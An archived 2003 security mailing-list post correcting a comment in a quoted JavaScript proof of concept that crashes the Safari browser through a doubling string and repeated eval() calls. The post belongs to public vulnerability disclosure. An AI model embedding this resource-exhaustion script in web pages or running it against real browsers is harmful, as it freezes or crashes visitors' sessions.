lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 23 Nov 2003 12:07:46 -0000
From: "Grant Husbands" <grant.husbands@...inesswebsoftware.com>
To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>
Subject: RE: safari dos


I wrote:
> b='';a="b=b+' ';"
> for (var i=0;i<15;++i) a+=a;
> // Above line creates a 64MB script
> // Now run the 64MB script, 100,000 times
> for (var i=0;i<100000;++i) eval(a);

Just a quick note; I had altered the script without updating
the comments. It only creates a 256KB script, now; a longer
one didn't seem necessary. Sorry.

Regards,
Grant.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ